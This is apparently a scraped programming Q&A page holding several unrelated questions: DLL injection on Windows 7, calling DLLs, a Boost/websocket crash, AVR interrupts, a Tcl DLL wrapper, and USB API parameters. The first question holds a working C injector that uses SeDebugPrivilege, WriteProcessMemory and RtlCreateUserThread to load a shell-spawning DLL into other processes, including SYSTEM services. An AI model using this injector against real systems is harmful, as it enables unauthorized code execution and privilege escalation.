i have written a program to inject dll.
i am using RltCreateUserThread. can someone tell me what i am doing wrong in here. I am able to inject the dll in processes but the injected dll spawns a cmd shell when injected to a process that is same as my current privileges but when i inject them into System/Local Service account processes it doesnot spwan a shell. i am using cmd.dll from Didier Stevens site which is from ReactOS. I am trying to do it from Windows 7 32 Bit.
#include <Windows.h>
#include <stdio.h>
#include <stdbool.h>
typedef struct _CLIENT_ID
{
PVOID UniqueProcess;
PVOID UniqueThread;
} CLIENT_ID, *PCLIENT_ID;
typedef long (*_RtlCreateUserThread)(HANDLE,
PSECURITY_DESCRIPTOR,
BOOLEAN,ULONG,
PULONG,PULONG,
PVOID,PVOID,
PHANDLE,PCLIENT_ID);
_RtlCreateUserThread RtlCreateUserThread;
int main(){
HANDLE hThd, hModule;
CLIENT_ID cid;
DWORD pid;
char * dll="cmd.dll";
HMODULE ntdll=LoadLibrary("ntdll.dll");
HMODULE k32=LoadLibrary("kernel32.dll");
RtlCreateUserThread=GetProcAddress(ntdll,"RtlCreateUserThread");
printf( "Enter pid :");
scanf("%u", &pid);
LUID luid;
HANDLE token_handle;
LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid);
TOKEN_PRIVILEGES tp;
tp.Privileges[0].Luid=luid;
tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
tp.PrivilegeCount=1;
OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&token_handle);
AdjustTokenPrivileges(token_handle,false,&tp,sizeof(tp),NULL,NULL);
HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,false,pid);
LPVOID vaex=VirtualAllocEx(hProc,NULL,strlen(dll) + 1,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProc,vaex,dll,strlen(dll),NULL);
RtlCreateUserThread(hProc,NULL,false,0,0,0,(PVOID)GetProcAddress(k32,"LoadLibraryA"),vaex,&hThd,&cid);
WaitForSingleObject(hThd,INFINITE);
CloseHandle(hThd);
CloseHandle(hProc);
FreeLibrary(k32);
FreeLibrary(ntdll);
return 0;
}
thanks,
Raja.
You cannot inject into system processes which have Protected Process Light protection.
Read Evolution of PPL and PPL Killer
This is a new protection mechanism since Windows 8/8.1
Related
I would like to know the proper procedure for calling a .dll file with also having a .cpp and .h files for a certain application. I have a program which is the .cpp file with different .h header files and I also included the .dll file into the folder where the .cpp and .h files are located. I would like to know in the .cpp code how am I able to call upon this .dll file since inside of it there are different functions that will allow a DDC264 Evaluation Board to read data from memory through usb and extract the data. I am using a program called DevC++ and I am receiving a current Error which is [Id] returned 1 exit status and MakefileWin has changed.
Attached below is a snippit of the .cpp code:
I also would like to know how to fix both of these errors .enter image description hereenter image description here
// USB_IO_for_VB6.cpp : Defines the entry point for the DLL application.
//
#include "stdafx.h"
#include "USB_IO_For_VB6.h"
#include "CyAPI.h"
#include <cstring>
#include <malloc.h>
#include "BASETSD.H"
#include <math.h>
#include <stdio.h>
// #include <string.h>
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
// This is an example of an exported variable
//int USB_IO_FOR_VB6_EXPORTS int USB_IO_for_VB6_API =22;
I
USB_IO_FOR_VB6_API int nUSB_IO_for_VB6 = 22;
#define STRINGLEN 65536 //the larger this number is, the faster the data is shifted in.
#define MAX_CHANNELS_FAST 4096 // 2048= 1024A + 1024B
#define DBP 0 //debug print - 1 enables writing some information to a file in "C:\temp\"
// This function reads the device descriptors from the Cypress USB Chip(s).
// It returns arrays of values, one set of values per device detected.
// The user can then use the visual basic software to select which device to use.
int __stdcall ReadDeviceDescriptors(int *USBdevCount, int *bLengthPass, int *bDescriptorTypePass,
long *bcdUSBPass, int *bDeviceClassPass, int *bDeviceSubClassPass,
int *bDeviceProtocolPass, int *bMaxPacketSize0Pass, long *idVendorPass,
long *idProductPass, long *bcdDevicePass, int *iManufacturerPass,
int *iProductPass, int *iSerialNumberPass, int *bNumConfigurationsPass)
{
CCyUSBDevice *USBDevice;
USB_DEVICE_DESCRIPTOR descr;
USBDevice = new CCyUSBDevice(NULL); // Create an instance of CCyUSBDevice
USBdevCount[0] = USBDevice->DeviceCount();
for (int i=0; i < USBDevice->DeviceCount(); i++)
{
if (USBDevice->Open(i))
{
USBDevice->GetDeviceDescriptor(&descr);
bLengthPass[i]=descr.bLength;
bDescriptorTypePass[i]=descr.bDescriptorType;
bcdUSBPass[i]=descr.bcdUSB;
bDeviceClassPass[i]=descr.bDeviceClass;
bDeviceSubClassPass[i]=descr.bDeviceSubClass;
bDeviceProtocolPass[i]=descr.bDeviceProtocol;
bMaxPacketSize0Pass[i]=descr.bMaxPacketSize0;
idVendorPass[i]=descr.idVendor;
idProductPass[i]=descr.idProduct;
bcdDevicePass[i]=descr.bcdDevice;
iManufacturerPass[i]=descr.iManufacturer;
iProductPass[i]=descr.iProduct;
iSerialNumberPass[i]=descr.iSerialNumber;
bNumConfigurationsPass[i]=descr.bNumConfigurations;
USBDevice->Close();
}
}
return( USBdevCount[0] );
}
I am not sure about how to go about calling a .dll file in C++, I am fairly new to Object Oriented programming.
Regarding the MakefileWin error I tried changing the TDM-GCC release version from 32 to 64 bits and the error continues.
I also tried deleting the dllmain.cpp which is another cpp file that is not needed and moving another original.cpp file from the folder that is shown in one of the images.
I only have a single .cpp file running on my DevC++ compiler which I thought would not cause the Error [Id] returned 1 to exit status to pop up.
I have a program using cpprestsdk for http querying and websocketpp for subscribing a data stream. The program will crash immediately(it says Process finished with exit code 139 (interrupted by signal 11: SIGSEGV)). But if I comment either of the http querying or subcribing data stream, the program won't crash.
#include <websocketpp/config/asio_client.hpp>
#include <websocketpp/client.hpp>
#include "json.hpp"
#include <iostream>
#include <ctime>
#include <iostream>
#include <cpprest/http_client.h>
#include <cpprest/filestream.h>
#include <vector>
#include <string>
using std::string;
using namespace web;
using std::cout, std::endl;
using std::vector;
using websocketpp::lib::placeholders::_1;
using websocketpp::lib::placeholders::_2;
using websocketpp::lib::bind;
typedef websocketpp::client<websocketpp::config::asio_tls_client> client;
typedef websocketpp::config::asio_client::message_type::ptr message_ptr;
void on_stream_data(websocketpp::connection_hdl hdl, message_ptr msg) {
}
class OrderBook {
public:
void initialize() {
web::http::client::http_client_config cfg;
std::string uri = string("https://fapi.binance.com/fapi/v1/depth?symbol=btcusdt&limit=1000");
web::http::client::http_client client(U(uri), cfg);
web::http::http_request request(web::http::methods::GET);
request.headers().add("Content-Type", "application/x-www-form-urlencoded");
web::http::http_response response = client.request(request).get();
}
int start_stream() {
client c;
std::string uri = string("wss://fstream.binance.com/ws/btcusdt#depth#100ms");
try {
c.set_access_channels(websocketpp::log::alevel::all);
c.clear_access_channels(websocketpp::log::alevel::frame_payload);
c.init_asio();
c.set_message_handler(bind(on_stream_data, ::_1, ::_2));
websocketpp::lib::error_code ec;
client::connection_ptr con = c.get_connection(uri, ec);
if (ec) {
std::cout << "could not create connection because: " << ec.message() << std::endl;
return 0;
}
c.connect(con);
c.run();
} catch (websocketpp::exception const &e) {
std::cout << e.what() << std::endl;
}
}
};
int main(int argc, char *argv[]) {
OrderBook ob;
ob.initialize(); // comment either of these two lines, the program won't crash, otherwise the program will crash once start
std::this_thread::sleep_for(std::chrono::milliseconds(10000000));
ob.start_stream(); // comment either of these two lines, the program won't crash, otherwise the program will crash once start
}
When I run this program in Clion debug mode, Clion show that the crash comes from function in /opt/homebrew/Cellar/boost/1.76.0/include/boost/asio/ssl/detail/impl/engine.ipp
int engine::do_connect(void*, std::size_t)
{
return ::SSL_connect(ssl_);
}
It says Exception: EXC_BAD_ACCESS (code=1, address=0xf000000000)
What's wrong with it? is it because I run two pieces of code using boost::asio, and something shouldn't be initialized twice?
I can compile this and run it fine.
My best bet is that you might be mixing versions, particularly boost versions. A common mode of failure is caused when ODR violations lead to Undefined Behaviour.
Note that these header-only libraries depend on a number of boost libraries that are not header-only (e.g. Boost System, Thread and/or Chrono). You need to compile against the same version as the libraries you link.
If you use distribution packaged versions of any library (cpprestsdk, websocketpp or whatever json library that is you're using) then you'd be safest also using the distribution packaged version of Boost.
I'd personally simplify the situation by just using Boost (Beast for HTTP/websocket, Json for, you guessed it).
Running it all on a test Ubuntu 18.04 the OS Boost 1.65 version, the start_stream sequence triggers this informative error:
[2022-05-22 13:42:11] [fatal] Required tls_init handler not present.
could not create connection because: Connection creation attempt failed
While being UBSAN/ASAN clean. Perhaps that error helps you, once you figure out the configuration problems that made your program crash.
Im trying to create a program which will interrupt when I press the button. I have Atmega8 and I use Microchip studio for coding.
I checked the document about interrupts on atmega's website however I can't say I totally got it.
Here is my code:
#define F_CPU 1000000UL
#define IRQ1 INT0_vect
#define IRQ2 INT1_vect
#include <avr/io.h>
#include <util/delay.h>
#include <avr/interrupt.h>
void init()
{
DDRB=0b11111111;
PORTB=255;
_delay_ms(2000);
PORTB=0;
DDRD = 0b00000000;
GICR=0xc0;
MCUCR=0x08;
}
int main(void){
init();
volatile int mode = 0;
ISR(IRQ1){
_delay_ms(500);
if (mode<3)mode++; else mode = 0;
}
ISR(IRQ2){
_delay_ms(150);
}
}
Errors I get:
Imgur
I would be glad if any admin edits my question and add picture here, website doesn't let me add photo because I need at least 10 reputation to post image
Don't try to define functions inside of other functions unless you really know what you are doing. You should move the ISR definitions to the top level of the file, putting them outside of main.
I have created a GUI using tcl. I want to make some of the core functionalities of the tcl code available to be used by any program which supports dll. For that i have taken a very simple tcl code example, which adds two integer numbers and i have written a c wrapper function to use this functionality. This is working for me. Now how can i create a dll for these two c and tcl files, so that any program can use this addition functionality by simply loading the dll.
Here is my simple tcl code :
/* Filename : simple_addition.tcl */
#!/usr/bin/env tclsh8.5
proc add_two_nos { } {
set a 10
set b 20
set c [expr { $a + $b } ]
puts " c is $c ......."
}
And here is my c wrapper function which uses the above tcl addition functionality :
#include <tcl.h>
#include <tclDecls.h>
#include <tclPlatDecls.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main (int argc, char **argv) {
Tcl_Interp *interp;
int code;
char *result;
printf("inside main function \n");
Tcl_FindExecutable(argv[0]);
interp = Tcl_CreateInterp();
code = Tcl_Eval(interp, "source simple_addition.tcl; add_two_nos");
/* Retrieve the result... */
result = Tcl_GetString(Tcl_GetObjResult(interp));
/* Check for error! If an error, message is result. */
if (code == TCL_ERROR) {
fprintf(stderr, "ERROR in script: %s\n", result);
exit(1);
}
/* Print (normal) result if non-empty; we'll skip handling encodings for now */
if (strlen(result)) {
printf("%s\n", result);
}
/* Clean up */
Tcl_DeleteInterp(interp);
exit(0);
}
This c wrapper is working fine for me and gives correct results.
Now I want to create a dll file, so that if i include that dll to any program that supports dll, it should be able to use this addition functionality of the above tcl code. Can anybody please tell me the way i can do it. Please help me. I am new to this dll concept.
In order to create the .dll you'll have to use something like Visual Studio and C or C++ to create the .dll (there are lots of other tools out there that can create .dll files but VS is easy to get hold of and to use.) So in VS create a new project, this needs to be a C++ WIN32 project. Select the DLL application type and the Export Symbols additional option.
VS will create a basic .dll that you can then amend to do what you want. I short I'd look at putting the creating/destruction of the intrepter into the dllmain:
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
Tcl_FindExecutable(NULL);
interp = Tcl_CreateInterp();
}
case DLL_THREAD_ATTACH:
break ;
case DLL_THREAD_DETACH:
break ;
case DLL_PROCESS_DETACH:
{
Tcl_DeleteInterp(interp);
break;
}
}
return TRUE;
}
and then create functions exported by the .dll that make use of the interpreter. If you aren't familiar with the concept of shared libaries then I'd suggest spending a little time reading up on them, try here and here for some background reading.
Basically, I am trying to control a USB device (a linear actuator control board) using the supplied DLL (mpusbapi.dll) and header file (mpusbapi.h). However, I can't for the life of me figure out which parameters I need to pass into MPUSBWrite().
In particular, the 2nd, 3rd and 4thparameters of MPUSBWrite(). The first parameter is clearly the handle that is returned by MPUSBOpen() and the last parameter is a timeout in ms.
I have a hunch it has something to do with page 6 of LAC advance config.
Any help is GREATLY appreciated. Thanks!
mpusbapi.h file
#ifndef _MPUSBAPI_H_
#define _MPUSBAPI_H_
#define MPUSB_FAIL 0
#define MPUSB_SUCCESS 1
#define MP_WRITE 0
#define MP_READ 1
// MAX_NUM_MPUSB_DEV is an abstract limitation.
// It is very unlikely that a computer system will have more
// then 127 USB devices attached to it. (single or multiple USB hosts)
#define MAX_NUM_MPUSB_DEV 127
DWORD (*MPUSBGetDLLVersion)(void);
DWORD (*MPUSBGetDeviceCount)(PCHAR pVID_PID);
HANDLE (*MPUSBOpen)(DWORD instance, // Input
PCHAR pVID_PID, // Input
PCHAR pEP, // Input
DWORD dwDir, // Input
DWORD dwReserved); // Input <Future Use>
DWORD (*MPUSBRead)(HANDLE handle, // Input
PVOID pData, // Output
DWORD dwLen, // Input
PDWORD pLength, // Output
DWORD dwMilliseconds); // Input
DWORD (*MPUSBWrite)(HANDLE handle, // Input
PVOID pData, // Input
DWORD dwLen, // Input
PDWORD pLength, // Output
DWORD dwMilliseconds); // Input
DWORD (*MPUSBReadInt)(HANDLE handle, // Input
PVOID pData, // Output
DWORD dwLen, // Input
PDWORD pLength, // Output
DWORD dwMilliseconds); // Input
BOOL (*MPUSBClose)(HANDLE handle);
#endif
LACTesting.cpp file
#include <windows.h> // This is a windows header file. The functions I mentioned above are declared here
#include "mpusbapi.h" // This is the header file supplied. It declares the function prototypes that are defined in the DLL
#include <iostream>
#include "ioctls.h"
using namespace std;
int main(int argc, char* argv)
{
// Try to load the library
HMODULE mpbusDLL = NULL;
mpbusDLL = LoadLibrary(L"mpusbapi.dll");
if (mpbusDLL != NULL) {
// If the library could be loaded, then load the functions using GetProcAddress()
// Load the function 'MPUSBOpen' from the DLL
MPUSBOpen = (HANDLE(*)(DWORD, PCHAR, PCHAR, DWORD, DWORD)) GetProcAddress(mpbusDLL, "_MPUSBOpen");
MPUSBOpen=(HANDLE(*)(DWORD,PCHAR,PCHAR,DWORD,DWORD))GetProcAddress(mpbusDLL,"_MPUSBOpen");
MPUSBGetDLLVersion=(DWORD(*)(void))GetProcAddress(mpbusDLL,"_MPUSBGetDLLVersion");
MPUSBGetDeviceCount=(DWORD(*)(PCHAR))GetProcAddress(mpbusDLL,"_MPUSBGetDeviceCount");
MPUSBWrite=(DWORD(*)(HANDLE,PVOID,DWORD,PDWORD,DWORD))GetProcAddress(mpbusDLL,"_MPUSBWrite");
MPUSBRead=(DWORD(*)(HANDLE,PVOID,DWORD,PDWORD,DWORD))GetProcAddress(mpbusDLL,"_MPUSBRead");
MPUSBReadInt=(DWORD(*)(HANDLE,PVOID,DWORD,PDWORD,DWORD))GetProcAddress(mpbusDLL,"_MPUSBReadInt");
MPUSBClose=(BOOL(*)(HANDLE))GetProcAddress(mpbusDLL,"_MPUSBClose");
}
//If the DLL didn't load, let me know!
else cout<<"DLL didn't load"<<endl;
//Declarations
HANDLE LACHandle;
PCHAR pipeName=MCHPUSB_PIPE_NAME;// intializes pipeName to "\\MCHP_EP"
PCHAR VidPid="vid_04d8&pid_fc5f";
LACHandle=MPUSBOpen(0,VidPid,pipeName,1,0);//open device connection
//Not sure if I pass in the correct arguements for MBUSBOpen. VidPid and pipeName are correct.
cout<<"Device ID "<<VidPid<<"is open with "<<MPUSBGetDeviceCount(VidPid)<<" device(s)."<<endl;
//sMPUSBWrite(LACHandle,,3,,1000); <- this is where I am having issues.
//I can't figure out how to use MPUSBWrite
MPUSBClose(LACHandle);// closes device connection
}
I think you should take a look at
Win32 Data Types
then work on Windows System Programming samples, then you will clearly understand the logic.
To your question, as i see the code i can guess
// yourData which want to write
PVOID pData
// sizeof(yourData) google "sizeof"
DWORD dwLen
/* I have no idea about this, but its output you can see it
after running function */
PDWORD pLength
Hope this helps